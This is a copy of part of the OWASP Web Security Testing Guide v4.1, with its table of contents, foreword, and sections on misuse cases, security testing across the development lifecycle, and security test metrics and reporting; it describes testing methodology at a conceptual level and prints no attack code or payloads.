wstg-v4 1 - Information Technology Management (2024)

ESTÁCIO

Angelo 22/09/2024


Web Security Testing Guide v4.1

Table of Contents

0. Foreword by Eoin Keary
1. Frontispiece
2. Introduction
2.1 The OWASP Testing Project
2.2 Principles of Testing
2.3 Testing Techniques Explained
2.4 Manual Inspections and Reviews
2.5 Threat Modeling
2.6 Source Code Review
2.7 Penetration Testing
2.8 The Need for a Balanced Approach
2.9 Deriving Security Test Requirements
2.10 Security Tests Integrated in Development and Testing Workflows
2.11 Security Test Data Analysis and Reporting
3. The OWASP Testing Framework
3.1 The Web Security Testing Framework
3.2 Phase 1 Before Development Begins
3.3 Phase 2 During Definition and Design
3.4 Phase 3 During Development
3.5 Phase 4 During Deployment
3.6 Phase 5 During Maintenance and Operations
3.7 A Typical SDLC Testing Workflow
3.8 Penetration Testing Methodologies
4. Web Application Security Testing
4.0 Introduction and Objectives
4.1 Information Gathering
4.1.1 Conduct Search Engine Discovery Reconnaissance for Information Leakage
4.1.2 Fingerprint Web Server
4.1.3 Review Webserver Metafiles for Information Leakage
4.1.4 Enumerate Applications on Webserver
4.1.5 Review Webpage Comments and Metadata for Information Leakage
4.1.6 Identify Application Entry Points
4.1.7 Map Execution Paths Through Application
4.1.8 Fingerprint Web Application Framework
4.1.9 Fingerprint Web Application
4.1.10 Map Application Architecture
4.2 Configuration and Deployment Management Testing
4.2.1 Test Network Infrastructure Configuration
4.2.2 Test Application Platform Configuration
4.2.3 Test File Extensions Handling for Sensitive Information
4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information
4.2.5 Enumerate Infrastructure and Application Admin Interfaces
4.2.6 Test HTTP Methods
4.2.7 Test HTTP Strict Transport Security
4.2.8 Test RIA Cross Domain Policy
4.2.9 Test File Permission
4.2.10 Test for Subdomain Takeover
4.2.11 Test Cloud Storage
4.3 Identity Management Testing
4.3.1 Test Role Definitions
4.3.2 Test User Registration Process
4.3.3 Test Account Provisioning Process
4.3.4 Testing for Account Enumeration and Guessable User Account
4.3.5 Testing for Weak or Unenforced Username Policy
4.4 Authentication Testing
4.4.1 Testing for Credentials Transported over an Encrypted Channel
4.4.2 Testing for Default Credentials
4.4.3 Testing for Weak Lock Out Mechanism
4.4.4 Testing for Bypassing Authentication Schema
4.4.5 Testing for Vulnerable Remember Password
4.4.6 Testing for Browser Cache Weaknesses
4.4.7 Testing for Weak Password Policy
4.4.8 Testing for Weak Security Question Answer
4.4.9 Testing for Weak Password Change or Reset Functionalities
4.4.10 Testing for Weaker Authentication in Alternative Channel
4.5 Authorization Testing
4.5.1 Testing Directory Traversal File Include
4.5.2 Testing for Bypassing Authorization Schema
4.5.3 Testing for Privilege Escalation
4.5.4 Testing for Insecure Direct Object References
4.6 Session Management Testing
4.6.1 Testing for Session Management Schema
4.6.2 Testing for Cookies Attributes
4.6.3 Testing for Session Fixation
4.6.4 Testing for Exposed Session Variables
4.6.5 Testing for Cross Site Request Forgery
4.6.6 Testing for Logout Functionality
4.6.7 Testing Session Timeout
4.6.8 Testing for Session Puzzling
4.7 Input Validation Testing
4.7.1 Testing for Reflected Cross Site Scripting
4.7.2 Testing for Stored Cross Site Scripting
4.7.3 Testing for HTTP Verb Tampering
4.7.4 Testing for HTTP Parameter Pollution
4.7.5 Testing for SQL Injection
4.7.5.1 Testing for Oracle
4.7.5.2 Testing for MySQL
4.7.5.3 Testing for SQL Server
4.7.5.4 Testing PostgreSQL
4.7.5.5 Testing for MS Access
4.7.5.6 Testing for NoSQL Injection
4.7.5.7 Testing for ORM Injection
4.7.5.8 Testing for Client Side
4.7.6 Testing for LDAP Injection
4.7.7 Testing for XML Injection
4.7.8 Testing for SSI Injection
4.7.9 Testing for XPath Injection
4.7.10 Testing for IMAP SMTP Injection
4.7.11 Testing for Code Injection
4.7.11.1 Testing for Local File Inclusion
4.7.11.2 Testing for Remote File Inclusion
4.7.12 Testing for Command Injection
4.7.13 Testing for Buffer Overflow
4.7.13.1 Testing for Heap Overflow
4.7.13.2 Testing for Stack Overflow
4.7.13.3 Testing for Format String
4.7.14 Testing for Incubated Vulnerability
4.7.15 Testing for HTTP Splitting Smuggling
4.7.16 Testing for HTTP Incoming Requests
4.7.17 Testing for Host Header Injection
4.7.18 Testing for Server Side Template Injection
4.8 Testing for Error Handling
4.8.1 Testing for Error Code
4.8.2 Testing for Stack Traces
4.9 Testing for Weak Cryptography
4.9.1 Testing for Weak SSL TLS Ciphers Insufficient Transport Layer Protection
4.9.2 Testing for Padding Oracle
4.9.3 Testing for Sensitive Information Sent via Unencrypted Channels
4.9.4 Testing for Weak Encryption
4.10 Business Logic Testing
4.10.0 Introduction to Business Logic
4.10.1 Test Business Logic Data Validation
4.10.2 Test Ability to Forge Requests
4.10.3 Test Integrity Checks
4.10.4 Test for Process Timing
4.10.5 Test Number of Times a Function Can Be Used Limits
4.10.6 Testing for the Circumvention of Work Flows
4.10.7 Test Defenses Against Application Misuse
4.10.8 Test Upload of Unexpected File Types
4.10.9 Test Upload of Malicious Files
4.11 Client Side Testing
4.11.1 Testing for DOM-Based Cross Site Scripting
4.11.2 Testing for JavaScript Execution
4.11.3 Testing for HTML Injection
4.11.4 Testing for Client Side URL Redirect
4.11.5 Testing for CSS Injection
4.11.6 Testing for Client Side Resource Manipulation
4.11.7 Testing Cross Origin Resource Sharing
4.11.8 Testing for Cross Site Flashing
4.11.9 Testing for Clickjacking
4.11.10 Testing WebSockets
4.11.11 Testing Web Messaging
4.11.12 Testing Browser Storage
4.11.13 Testing for Cross Site Script Inclusion
5. Reporting
Appendix A. Testing Tools Resource
Appendix B. Suggested Reading
Appendix C. Fuzz Vectors
Appendix D. Encoded Injection
Appendix E. History

Foreword by Eoin Keary

The problem of insecure software is perhaps the most important technical challenge of our time. The dramatic rise of web applications enabling business, social networking, etc. has only compounded the requirements to establish a robust approach to writing and securing our Internet, web applications, and data.

At The Open Web Application Security Project (OWASP), we’re trying to make the world a place where insecure software is the anomaly, not the norm. The OWASP Testing Guide has an important role to play in solving this serious issue. It is vitally important that our approach to testing software for security issues is based on the principles of engineering and science. We need a consistent, repeatable, and defined approach to testing web applications.
A world without some minimal standards in terms of engineering and technology is a world in chaos.

It goes without saying that you can’t build a secure application without performing security testing on it. Testing is part of a wider approach to building a secure system. Many software development organizations do not include security testing as part of their standard software development process. What is even worse is that many security vendors deliver testing with varying degrees of quality and rigor.

Security testing, by itself, isn’t a particularly good standalone measure of how secure an application is, because there are an infinite number of ways that an attacker might be able to make an application break, and it simply isn’t possible to test them all. We can’t hack ourselves secure, and we only have a limited time to test and defend where an attacker does not have such constraints.

In conjunction with other OWASP projects such as the Code Review Guide, the Development Guide, and tools such as OWASP ZAP, this is a great start towards building […]

By going through the steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios.

Misuse scenarios allow the analysis of the application from the attacker’s point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which are the most critical and need to be documented in security requirements.
The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated.

To derive security requirements from both use and misuse cases, it is important to define the functional scenarios and the negative scenarios and put these in graphical form. The following example is a step-by-step methodology for the case of deriving security requirements for authentication.

Step 1: Describe the Functional Scenario

The user authenticates by supplying a username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails.

Step 2: Describe the Negative Scenario

An attacker breaks the authentication through a brute force or dictionary attack of passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information to an attacker that is used to guess which accounts are valid registered accounts (usernames). The attacker then attempts to brute force the password for a valid account. A brute force attack on passwords with a minimum length of four digits can succeed with a limited number of attempts (i.e., 10^4).

Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case

The graphical example below depicts the derivation of security requirements via use and misuse cases. The functional scenario consists of the user actions (entering a username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e., trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages.
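The arithmetic behind the Step 2 estimate is worth making explicit: a four-digit numeric password admits only 10^4 candidates, so without a lockout even a slow online guesser succeeds quickly. The guessing rate below is an assumed figure for illustration, not a measured one.

```python
# Why the lockout requirement matters: the search space of a password made
# of four digits is tiny. The guessing rate is assumed for illustration.
digits, length = 10, 4
search_space = digits ** length           # 10^4 = 10,000 candidate passwords
expected_attempts = search_space / 2      # on average, half the space is tried
guesses_per_second = 10                   # assumed online guessing rate
seconds_to_break = expected_attempts / guesses_per_second
minutes_to_break = seconds_to_break / 60  # roughly 8.3 minutes on average
```

Even at this modest rate, the average time to break such a password is measured in minutes, which motivates the lockout requirement derived below.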
By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats.

https://folk.uio.no/nik/2001/21-sindre.pdf
https://iacis.org/iis/2006/Damodaran.pdf

Figure 2-5: Use and Misuse Case

Step 4: Elicit the Security Requirements

In this case, the following security requirements for authentication are derived:

1. Password requirements must be aligned with the current standards for sufficient complexity.
2. Accounts must be locked out after five unsuccessful login attempts.
3. Login error messages must be generic.

These security requirements need to be documented and tested.

Security Tests Integrated in Development and Testing Workflows

Security Testing in the Development Workflow

Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that the individual software components they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executable files. For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected.
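The authentication requirements elicited in Step 4 above translate naturally into such security unit tests. A minimal sketch follows; the `AuthService` class is a hypothetical in-memory stand-in for the real component under test, not part of any actual framework, and the lockout threshold and generic message mirror the derived requirements.

```python
# Security unit tests for the derived authentication requirements.
# AuthService is a hypothetical stand-in for the component under test.

MAX_ATTEMPTS = 5
GENERIC_ERROR = "Invalid username or password."

class AuthService:
    def __init__(self, users):
        self.users = users      # username -> password
        self.failures = {}      # username -> failed-attempt count

    def login(self, username, password):
        # Requirement 2: lock the account after five unsuccessful attempts.
        if self.failures.get(username, 0) >= MAX_ATTEMPTS:
            return (False, GENERIC_ERROR)
        if self.users.get(username) == password:
            self.failures[username] = 0
            return (True, "OK")
        # Requirement 3: never reveal whether the username or the password
        # was wrong -- the error message stays generic.
        self.failures[username] = self.failures.get(username, 0) + 1
        return (False, GENERIC_ERROR)

def run_security_unit_tests():
    svc = AuthService({"alice": "c0rrect-h0rse"})
    # Negative assertion: a wrong password fails with a generic message.
    assert svc.login("alice", "guess1") == (False, GENERIC_ERROR)
    # An unknown user gets the *same* message (no account harvesting).
    assert svc.login("nobody", "guess1") == (False, GENERIC_ERROR)
    # After five failures the account is locked, even for the right password.
    for _ in range(4):
        svc.login("alice", "bad")
    assert svc.login("alice", "c0rrect-h0rse") == (False, GENERIC_ERROR)
    return "all security unit tests passed"
```

Note how the tests assert negative requirements (what must not happen) alongside the positive ones, which is the pattern the following sections elaborate.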
Before integrating both new and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed and validated.

The validation of source code before integration in application builds is usually the responsibility of the senior developer. Senior developers are also the subject matter experts in software security, and their role is to lead the secure code review. They must make decisions on whether to accept the code to be released in the application build, or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance, as well as a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management system. The build master then can look at the test results reported by the developers in the tool, and grant approvals for checking the code changes into the application build.

Security Testing in the Test Workflow

After components and code changes are tested by developers and checked in to the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole entity. This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities, they can be used to validate both the security functionality of the application as a whole, as well as the exposure to application level vulnerabilities. These security tests on the application include both white-box testing, such as source code analysis, and black-box testing, such as penetration testing. Tests can also include gray-box testing, in which it is assumed that the tester has some partial knowledge about the application.
For example, with some knowledge about the session management of the application, the tester can better understand whether the logout and timeout functions are properly secured.

The target for the security tests is the complete system that is vulnerable to attack. During this phase, it is possible for security testers to determine whether vulnerabilities can be exploited. These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews.

Usually, testing engineers, rather than software developers, perform security tests when the application is in scope for integration system tests. Testing engineers have security knowledge of web application vulnerabilities, black-box and white-box testing techniques, and own the validation of security requirements in this phase. In order to perform security tests, it is a prerequisite that security test cases are documented in the security testing guidelines and procedures.

A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application’s functional testing is usually a responsibility of QA testers, while white-hat hackers or security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team to conduct such tests when a third party assessment is not required (such as for auditing purposes).

Since these tests can sometimes be the last line of defense for fixing vulnerabilities before the application is released to production, it is important that issues are addressed as recommended by the testing team.
The recommendations can include code, design, or configuration changes. At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the development team to fix all high risk vulnerabilities before the application can be deployed, unless such risks are acknowledged and accepted.

Developer’s Security Tests

Security Testing in the Coding Phase: Unit Tests

From the developer’s perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers’ own coding artifacts (such as functions, methods, classes, APIs, and libraries) need to be functionally validated before being integrated into the application build.

The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. If the unit test activity follows a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented. Both secure code reviews and source code analysis through source code analysis tools can help developers in identifying security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging), developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis.

A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework.
A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as:

Identity, authentication & access control
Input validation & encoding
Encryption
User and session management
Error and exception handling
Auditing and logging

Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as JUnit, NUnit, and CUnit can be adapted to verify security test requirements. In the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitization) and boundary checks for variables by asserting the expected functionality of the component.

The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components.
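The input validation and boundary check test case described above can be sketched in the style of an xUnit framework (the text names JUnit, NUnit, and CUnit; Python's unittest is used here for a self-contained illustration). The `validate_quantity` component is hypothetical.

```python
# Unit-level input validation test in the xUnit style. validate_quantity
# is a hypothetical component under test enforcing type and boundary rules.
import unittest

def validate_quantity(raw):
    """Parse an order quantity, enforcing type and boundary constraints."""
    if not isinstance(raw, str) or not raw.isdigit():
        raise ValueError("quantity must be a non-negative integer string")
    value = int(raw)
    if not 1 <= value <= 100:   # boundary check: illustrative business limit
        raise ValueError("quantity out of range")
    return value

class QuantityValidationTest(unittest.TestCase):
    def test_accepts_in_range_values(self):
        # Positive assertions: boundary values are accepted.
        self.assertEqual(validate_quantity("1"), 1)
        self.assertEqual(validate_quantity("100"), 100)

    def test_rejects_boundary_violations(self):
        for bad in ("0", "101"):
            with self.assertRaises(ValueError):
                validate_quantity(bad)

    def test_rejects_non_numeric_input(self):
        # Negative assertions: injection-style payloads must not parse.
        for bad in ("-5", "1; DROP TABLE orders", "<script>", ""):
            with self.assertRaises(ValueError):
                validate_quantity(bad)

if __name__ == "__main__":
    unittest.main()
```

The same structure carries over to JUnit or NUnit: positive assertions for expected functionality, negative assertions for the misuse cases.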
In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number).

At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being de-allocated (e.g., connection handles not closed within a final statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces.

Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and can be checked in to the integrated system build. Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the application build.

Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer’s security testing guide.
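The negative assertions about exception handling described above can be sketched as follows. The `Session` class is hypothetical; the point is the shape of the test: force a fault, then assert that no elevated privilege or leaked resource survives it.

```python
# Negative security assertion: an exception must not leave the system in an
# insecure state (privileges still elevated, handles still open).
# Session is a hypothetical stand-in for a real component.

class Session:
    def __init__(self):
        self.privilege = "user"
        self.open_handles = 0

    def run_privileged(self, action):
        """Temporarily elevate privileges; always restore state on exit."""
        self.privilege = "admin"
        self.open_handles += 1
        try:
            return action()
        finally:
            # The security-relevant part: the finally block guarantees
            # de-allocation and privilege drop even when action() raises.
            self.open_handles -= 1
            self.privilege = "user"

def test_exception_leaves_secure_state():
    s = Session()
    def failing_action():
        raise RuntimeError("simulated fault")
    try:
        s.run_privileged(failing_action)
    except RuntimeError:
        pass
    # Negative assertions: no privilege elevation or leaked handle survives.
    assert s.privilege == "user"
    assert s.open_handles == 0
    return "secure-state assertions passed"
```

Removing the `finally` block makes both assertions fail on the fault path, which is exactly the insecure-state scenario the text warns about.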
When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards.

Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control; for example, software artifacts cannot be checked into the build with high or medium severity coding issues.

Functional Testers’ Security Tests

Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests

The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing.

The integration system test environment is also the first environment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information).

Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests.
From the security testing perspective, these are risk-driven tests and have the objective of testing the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production.

Including security testing in the integration and validation phase is critical to identifying vulnerabilities due to integration of components, as well as validating the exposure of such vulnerabilities. Application security testing requires a specialized set of skills, including both software and security knowledge, that are not typical of security engineers. As a result, organizations are often required to security-train their software developers on ethical hacking techniques, and security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so-called “security test cases cheat list or checklist”, for example, can provide simple test cases and attack vectors that can be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service, and managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very basic knowledge of software security.

The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states and gathering knowledge from the application behavior.
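Part of this first battery of checks can even be scripted: send a classic attack vector and scan the response body for database error signatures. A sketch follows; the signature list is deliberately short and purely illustrative, and real checklists and tools carry far longer ones.

```python
# Heuristic check: does an HTTP response body leak a database exception?
# The signature list is illustrative only; real tools use far longer lists.
import re

SQL_ERROR_SIGNATURES = [
    r"you have an error in your sql syntax",    # MySQL
    r"unclosed quotation mark",                 # Microsoft SQL Server
    r"ora-\d{5}",                               # Oracle error codes
    r"syntax error at or near",                 # PostgreSQL
]

def looks_like_sql_error(response_body):
    """Return True if the body matches a known database error signature."""
    body = response_body.lower()
    return any(re.search(sig, body) for sig in SQL_ERROR_SIGNATURES)

# A response echoing a database exception suggests the injected test input
# (e.g., a single quote) reached the SQL layer unsanitized.
leaky = "Warning: ORA-01756: quoted string not properly terminated"
clean = "<html><body>No results found for your search.</body></html>"
```

A match is only evidence, not proof, of an exploitable flaw; as the text notes, the error is a manifestation that then needs to be confirmed.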
For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input, and by checking if SQL exceptions are thrown back to the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited.

A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. Besides source code analysis and penetration testing, these techniques include, for example: source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments.

The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance test (UAT) environment is the one that is most representative of the release configuration, with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, a valid SSL certificate and secure configuration, essential services disabled, and the web root directory cleaned of test and administration web pages.

Security Test Data Analysis and Reporting

Goals for Security Test Metrics and Measurements

Defining the goals for the security testing metrics and measurements is a prerequisite for using security testing data for risk analysis and management processes.
For example, a measurement, such as the total number of vulnerabilities found with security tests, might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing, for example, reducing the number of vulnerabilities to an acceptable minimum number before the application is deployed into production.

Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., fewer vulnerabilities) when compared with the baseline.

In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bugs). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required, and the cost to implement the fix.

A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk.
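One common way to combine such factors, in the spirit of the OWASP Risk Rating Methodology, is to score likelihood and impact on a 0-9 scale, band each into low/medium/high, and read an overall severity off a matrix. The banding thresholds and matrix below are a simplified illustration, not a normative scheme.

```python
# Illustrative sketch of deriving a qualitative risk rating from likelihood
# and impact factor scores (0-9). Thresholds and matrix are simplified.

def band(score):
    """Map a 0-9 factor score to a qualitative level."""
    if score < 3:
        return "low"
    if score < 6:
        return "medium"
    return "high"

SEVERITY = {
    ("low", "low"): "note",         ("low", "medium"): "low",
    ("low", "high"): "medium",      ("medium", "low"): "low",
    ("medium", "medium"): "medium", ("medium", "high"): "high",
    ("high", "low"): "medium",      ("high", "medium"): "high",
    ("high", "high"): "critical",
}

def risk_rating(likelihood, impact):
    """Combine likelihood and impact scores into an overall severity."""
    return SEVERITY[(band(likelihood), band(impact))]
```

For example, a vulnerability with high likelihood (score 7) but medium impact (score 4) would rate "high", which is the kind of label risk management decisions are then made against.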
Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. A measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors, and by validating the vulnerability with penetration tests. The risk metrics associated with vulnerabilities found with security tests empower business management to make risk management decisions, such as deciding whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical risks).

When evaluating the security posture of an application, it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application during testing. Since testing reduces issues, it is logical for larger applications to be tested more often than smaller ones.

When security testing is done in several phases of the SDLC, the test data can prove the capability of the security tests in detecting vulnerabilities as soon as they are introduced. The test data can also prove the effectiveness of removing the vulnerabilities by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also defined as "containment metrics" and provides a measure of the ability of a security assessment performed at each phase of the development process to maintain security within each phase.
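Assuming each finding records both the phase in which it was introduced and the phase in which it was detected (a hypothetical record layout, not one prescribed by this guide), a containment metric of this kind could be computed as:

```python
from collections import Counter

def containment(findings):
    """Per-phase containment: the share of vulnerabilities introduced in a
    phase that were also detected in that same phase.

    `findings` is a list of (phase_introduced, phase_detected) pairs.
    """
    introduced = Counter(intro for intro, _ in findings)
    contained = Counter(intro for intro, det in findings if intro == det)
    return {phase: contained[phase] / total for phase, total in introduced.items()}
```

A design-phase containment of 0.5 would mean half of the design flaws were caught during design review, while the rest escaped to later, more expensive phases.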
These containment metrics are also a critical factor in lowering the cost of fixing vulnerabilities. It is less expensive to deal with vulnerabilities in the same phase of the SDLC in which they are found, rather than fixing them later in another phase.

Security test metrics can support security risk, cost, and defect management analysis when they are associated with tangible and timed goals such as:

Reducing the overall number of vulnerabilities by 30%.
Fixing security issues by a certain deadline (e.g., before beta release).

Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews compared to penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good.

Security test data can also support specific objectives of the security analysis. These objectives could be compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security cost-benefit analysis.

When security test data is reported, it has to provide metrics to support the analysis.
The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced, as well as the effectiveness of the process.

Some examples of clues supported by security test data can be:

Are vulnerabilities reduced to an acceptable level for release?
How does the security quality of this product compare with similar software products?
Are all security test requirements being met?
What are the major root causes of security issues?
How numerous are security flaws compared to security bugs?
Which security activity is most effective in finding vulnerabilities?
Which team is more productive in fixing security defects and vulnerabilities?
What percentage of overall vulnerabilities are high risk?
Which tools are most effective in detecting security vulnerabilities?
What kind of security tests are most effective in finding vulnerabilities (e.g., white-box vs. black-box tests)?
How many security issues are found during secure code reviews?
How many security issues are found during secure design reviews?

In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools to use. Security tools can be qualified as being good at finding common, known vulnerabilities when targeting different artifacts.

It is important to note that unknown security issues are not tested. The fact that a security test is clear of issues does not mean that the software or application is good.

Even the most sophisticated automation tools are not a match for an experienced security tester. Just relying on successful test results from automated tools will give security practitioners a false sense of security.
Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources, as well as in security test training.

Reporting Requirements

The security posture of an application can be characterized from the perspective of the effect, such as the number of vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause or origin, such as coding errors, architectural flaws, and configuration issues.

Vulnerabilities can be classified according to different criteria. The most commonly used vulnerability severity metric is the Common Vulnerability Scoring System (CVSS, https://www.first.org/cvss/), a standard maintained by the Forum of Incident Response and Security Teams (FIRST).

When reporting security test data, the best practice is to include the following information:

a categorization of each vulnerability by type;
the security threat that each issue is exposed to;
the root cause of each security issue, such as the bug or flaw;
each testing technique used to find the issues;
the remediation, or countermeasure, for each vulnerability; and
the severity rating of each vulnerability (e.g., high, medium, low, or CVSS score).

By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat.

Reporting the root cause of the issue can help pinpoint what needs to be fixed.
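The reporting fields listed above map naturally onto a structured record. A sketch with illustrative field names of my choosing, not a format prescribed by this guide:

```python
from dataclasses import dataclass

@dataclass
class VulnerabilityReportEntry:
    """One reported issue, mirroring the fields recommended above."""
    category: str     # vulnerability type, e.g. "SQL Injection"
    threat: str       # the security threat the issue is exposed to
    root_cause: str   # "bug" (coding error) or "flaw" (design error)
    technique: str    # testing technique used to find the issue
    remediation: str  # countermeasure / fix guidance for the developer
    severity: str     # "high" / "medium" / "low", or a CVSS score string

# Example entry (hypothetical finding).
entry = VulnerabilityReportEntry(
    category="SQL Injection",
    threat="Unauthorized access to database contents",
    root_cause="bug",
    technique="manual penetration test",
    remediation="Use parameterized queries for all database access",
    severity="high",
)
```

Keeping findings in a uniform structure like this makes the later aggregation — counts by severity, flaws versus bugs, issues per technique — straightforward.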
In the case of white-box testing, for example, the software security root cause of the vulnerability will be the offending source code.

Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white-box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black-box penetration test, the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., the client).

The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should provide secure coding examples, configuration changes, and adequate references.

Finally, the severity rating contributes to the calculation of risk rating and helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves external risk analysis based upon factors such as impact and exposure.

Business Cases

For the security test metrics to be useful, they need to provide value back to the organization's security test data stakeholders. The stakeholders can include project managers, developers, information security offices, auditors, and chief information officers. The value can be in terms of the business case that each project stakeholder has, in terms of role and responsibility.

Software developers look at security test data to show that software is coded securely and efficiently.
This allows them to make the case for using source code analysis tools, following secure coding standards, and attending software security training.

